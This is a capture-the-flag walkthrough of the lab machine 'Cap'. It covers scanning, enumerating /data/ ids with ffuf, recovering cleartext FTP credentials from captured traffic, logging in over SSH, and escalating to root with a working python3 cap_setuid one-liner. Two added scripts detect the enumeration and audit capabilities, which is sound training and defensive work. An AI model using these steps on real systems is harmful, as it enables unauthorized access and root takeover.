Reconnaissance / Scanning
Scan the target with nmap.
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2vrva1a+HtV5SnbxxtZSs+D8/EXPL2wiqOUG2ngq9zaPlF6cuLX3P2QYvGfh5bcAIVjIqNUmmc1eSHVxtbmNEQjyJdjZOP4i2IfX/RZUA18dWTfEWlNaoVDGBsc8zunvFk3nkyaynnXmlH7n3BLb1nRNyxtouW+q7VzhA6YK3ziOD6tXT7MMnDU7CfG1PfMqdU297OVP35BODg1gZawthjxMi5i5R1g3nyODudFoWaHu9GZ3D/dSQbMAxsly98L1Wr6YJ6M6xfqDurgOAl9i6TZ4zx93c/h1MO+mKH7EobPR/ZWrFGLeVFZbB6jYEflCty8W8Dwr7HOdF1gULr+Mj+BcykLlzPoEhD7YqjRBm8SHdicPP1huq+/3tN7Q/IOf68NNJDdeq6QuGKh1CKqloT/+QZzZcJRubxULUg8YLGsYUHd1umySv4cHHEXRl7vcZJst78eBqnYUtN3MweQr4ga1kQP4YZK5qUQCTPPmrKMa9NPh1sjHSdS8IwiH12V0=
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqG/RCH23t5Pr9sw6dCqvySMHEjxwCfMzBDypoNIMIa8iKYAe84s/X7vDbA9T/vtGDYzS+fw8I5MAGpX8deeKI=
|   256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPbLTiQl+6W0EOi8vS+sByUiZdBsuz0v/7zITtSuaTFH
80/tcp open  http    syn-ack ttl 63 Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET
Opening the site in a browser displays a page like the one below.

Opening Security Snapshot shows that the number after /data in the URL changes.
Fuzz that number.
┌──(kali㉿kali)-[~/htb/cap]
└─$ seq 0 100 > number.txt
┌──(kali㉿kali)-[~/htb/cap]
└─$ ffuf -u http://10.129.14.110/data/FUZZ -w number.txt
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.14.110/data/FUZZ
:: Wordlist : FUZZ: /home/kali/htb/cap/number.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
39 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
14 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
17 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
15 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
21 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
16 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
28 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
29 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
25 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
34 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
30 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 183ms]
36 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 185ms]
35 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 184ms]
31 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 185ms]
32 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 185ms]
37 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 187ms]
38 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 187ms]
33 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 188ms]
9 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 188ms]
20 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 184ms]
22 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 191ms]
27 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 191ms]
24 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 191ms]
11 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 189ms]
8 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 190ms]
26 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 194ms]
23 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 195ms]
12 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 193ms]
13 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 193ms]
10 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 194ms]
18 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 202ms]
19 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 211ms]
4 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 303ms]
1 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 312ms]
3 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 316ms]
41 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
42 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
40 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
2 [Status: 200, Size: 17147, Words: 7066, Lines: 371, Duration: 180ms]
43 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
45 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
44 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
49 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
48 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
46 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
47 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
54 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
51 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
52 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
53 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
50 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
56 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
57 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
58 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
55 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
59 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
6 [Status: 200, Size: 17144, Words: 7066, Lines: 371, Duration: 188ms]
5 [Status: 200, Size: 17144, Words: 7066, Lines: 371, Duration: 189ms]
61 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
7 [Status: 200, Size: 17144, Words: 7066, Lines: 371, Duration: 193ms]
65 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
63 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
62 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
60 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 185ms]
66 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
64 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 184ms]
68 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
67 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
69 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
70 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
71 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
0 [Status: 200, Size: 17147, Words: 7066, Lines: 371, Duration: 227ms]
72 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 175ms]
73 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
74 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
77 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
78 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
75 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
76 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
79 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 175ms]
80 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 175ms]
81 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 175ms]
82 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
83 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
85 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
84 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
87 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
86 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
91 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
92 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
94 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
98 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
90 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
88 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 183ms]
93 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
95 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
89 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
96 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
100 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
97 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
99 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
:: Progress: [101/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
The file served at /data/0 contains FTP traffic. Viewing it as a stream reveals the account credentials nathan/Buck3tH4TF0RM3!, since FTP sends the login in cleartext.
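The /data/<n> sweep above is easy to spot from the server side. The following is an added example, not part of the original write-up: a detector that flags clients requesting many distinct /data ids with mostly 302 answers. It assumes Gunicorn's default access-log layout; the log lines, client addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict

# Gunicorn's default access-log layout: ip - user [time] "request" status size "referer" "agent"
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"GET /data/(?P<id>\d+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

def find_id_enumeration(lines, min_ids=20, min_miss_ratio=0.8):
    """Return {client_ip: (distinct_ids, miss_ratio)} for clients walking /data/<n>."""
    ids, total, misses = defaultdict(set), defaultdict(int), defaultdict(int)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip = m["ip"]
        ids[ip].add(int(m["id"]))
        total[ip] += 1
        # As in the ffuf run above: an unknown id answers 302, an existing one 200.
        if m["status"] != "200":
            misses[ip] += 1
    flagged = {}
    for ip, seen in ids.items():
        ratio = misses[ip] / total[ip]
        # Many distinct ids with mostly misses means guessing, not browsing.
        if len(seen) >= min_ids and ratio >= min_miss_ratio:
            flagged[ip] = (len(seen), round(ratio, 2))
    return flagged

def build_sample_log():
    """Constructed log: one client sweeping ids 0-100, one user opening a few snapshots."""
    existing = {0, 2, 5, 6, 7}  # ids that answered 200 in the ffuf output
    stamp = "[02/Apr/2026:14:05:00 +0000]"
    lines = []
    for n in range(101):
        status, size = (200, 17147) if n in existing else (302, 208)
        lines.append(f'198.51.100.23 - - {stamp} "GET /data/{n} HTTP/1.1" {status} {size} "-" "-"')
    for n in (5, 5, 6):
        lines.append(f'192.0.2.10 - - {stamp} "GET /data/{n} HTTP/1.1" 200 17144 "-" "-"')
    return lines

if __name__ == "__main__":
    for ip, (count, ratio) in find_id_enumeration(build_sample_log()).items():
        print(f"{ip}: {count} distinct /data ids, {ratio:.0%} misses")
```

Detection only shortens the exposure; the underlying fix is for the /data/<n> handler to confirm that the requested snapshot belongs to the requesting session before serving it.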
Getting user.txt
Logging in over SSH with the credentials recovered from the FTP traffic gives access to user.txt.
┌──(kali㉿kali)-[~/htb/cap]
└─$ ssh nathan@10.129.14.110
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
nathan@10.129.14.110's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage
System information as of Thu Apr 2 14:17:47 UTC 2026
System load: 0.08
Usage of /: 36.8% of 8.73GB
Memory usage: 23%
Swap usage: 0%
Processes: 228
Users logged in: 0
IPv4 address for eth0: 10.129.14.110
IPv6 address for eth0: dead:beef::250:56ff:feb0:673b
=> There are 4 zombie processes.
63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
nathan@cap:~$ ls
user.txt
nathan@cap:~$
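Privilege escalation
Output from linpeas and similar checks shows that Python has the cap_setuid capability.
Use this to escalate to root: with cap_setuid, the interpreter can call os.setuid(0) even when started by an unprivileged user.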

nathan@cap:~$ getcap -r / 2> /dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
#
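The same getcap output can drive a hardening check. The following is an added example, not part of the original write-up: it parses `getcap -r /` output and reports binaries that hold root-equivalent capabilities, rating interpreters as critical because they run whatever code the caller supplies. The capability list, interpreter list and severity labels are this example's own choices.

```python
import re

# Capabilities that allow becoming root or bypassing file permission checks.
ESCALATING = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_module",
              "cap_sys_ptrace", "cap_dac_override", "cap_dac_read_search",
              "cap_chown", "cap_fowner"}
# Binaries that run caller-supplied code, so any capability is handed to that code.
INTERPRETER = re.compile(r"/(python|perl|ruby|php|node|lua|tclsh|gdb)[\d.]*$")
CLAUSE = re.compile(r"([a-z0-9_,]+)[+=]([eip]+)")

# getcap output exactly as shown on this page.
PAGE_OUTPUT = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

def parse_getcap(text):
    """Yield (path, {capability: flags}) per line; accepts 'path = caps+flags'
    (as on this page) and the 'path caps=flags' layout of newer libcap releases."""
    for line in map(str.strip, text.splitlines()):
        if " = " in line:
            path, spec = line.split(" = ", 1)
        else:
            path, _, spec = line.rpartition(" ")
        if not path.startswith("/"):
            continue  # prompts, blank lines, anything that is not a result row
        caps = {}
        for names, flags in CLAUSE.findall(spec):
            for name in names.split(","):
                caps[name] = flags
        yield path, caps

def audit(text):
    """Return [(path, risky_caps, severity)] for binaries holding escalating capabilities."""
    findings = []
    for path, caps in parse_getcap(text):
        # Permitted (p) is enough: the process can raise it into its effective set.
        risky = sorted(c for c, f in caps.items() if c in ESCALATING and "p" in f)
        if risky:
            severity = "critical" if INTERPRETER.search(path) else "review"
            findings.append((path, risky, severity))
    return findings

if __name__ == "__main__":
    for path, risky, severity in audit(PAGE_OUTPUT):
        print(f"[{severity}] {path}: {','.join(risky)}")
```

Where the interpreter has no need for the capability, `setcap -r /usr/bin/python3.8` removes it.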